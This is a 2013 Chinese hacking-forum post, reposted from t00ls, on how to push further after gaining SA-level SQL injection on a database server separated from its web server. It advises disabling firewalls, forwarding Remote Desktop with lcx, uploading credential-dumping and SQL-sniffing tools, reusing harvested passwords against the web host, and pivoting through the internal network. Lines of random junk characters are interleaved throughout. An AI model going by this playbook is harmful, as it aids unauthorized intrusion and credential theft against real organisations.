当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
$ f# @2 ?, ~( k/ f3 ]9 Q. W; H5 ^* ?
' e0 ^; \( S: U9 k* F0 U1 }
7 L" F5 C* I/ O" oSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
H w7 T. ^& v! b4 d
8 f o3 J7 ^ G% U) s i6 [& Y# E& `, F& x
一、DB机有公网IP.
" I% e5 M* a- `5 }3 P' m8 Y) n
8 o4 T3 d8 z. q. U6 y$ \: A3 y1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
" I8 _$ U3 Q( R8 b
% r- j. M+ w: x3 D: p( b
1 H. Q) W" T# H2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
! c( M; _2 Q$ E
0 `% ^. ^8 @) Z9 f9 J5 F3 Z6 Y% S" y- C
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
4 x0 j! j0 _, @& K- H
& I: m3 Z4 d* P9 b/ P3 L6 L _& _9 c; j0 I7 U" m7 Y( R& x
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
- ~; F5 m+ D% c" @! y8 T+ l$ F5 y3 I+ F/ V1 g+ C6 d
% m) k1 V$ R2 y0 A) G/ I
4 Q4 j* O$ b9 e7 A# z二、DB机只有内网IP
* x5 z0 G" a8 C' ^2 _# L' K
: V" r4 r& B* G) t1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.0 v0 f6 d! n4 K5 t3 F+ u
1 t! w+ ` s4 R# o! d9 b2 d+ M' `5 ?& Q
2:停掉防火墙和IP策略再从内往外扫描.9 Y' a& Y1 ~" W- V$ ?
- w) y5 Y; f" p. _ {. L# t( T
) @$ @7 x2 K) d; ]$ W& i2 F/ P v+ q3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
7 \/ n4 V; j' R
2 S1 P9 |6 G9 [% ^! x) ]
9 {+ G! h/ E6 W. J4:学会密码规律分析往往会有惊喜.
4 Y) R7 C$ @' c( j* z0 \
. j( z, ~ b7 y0 |1 [' l" f% t6 B4 K/ c Y
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等( U7 |' X; K( V6 t; ^
9 ?* D) g/ f. G0 i+ j
! _- ~& d( s2 F! W! Q; `
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对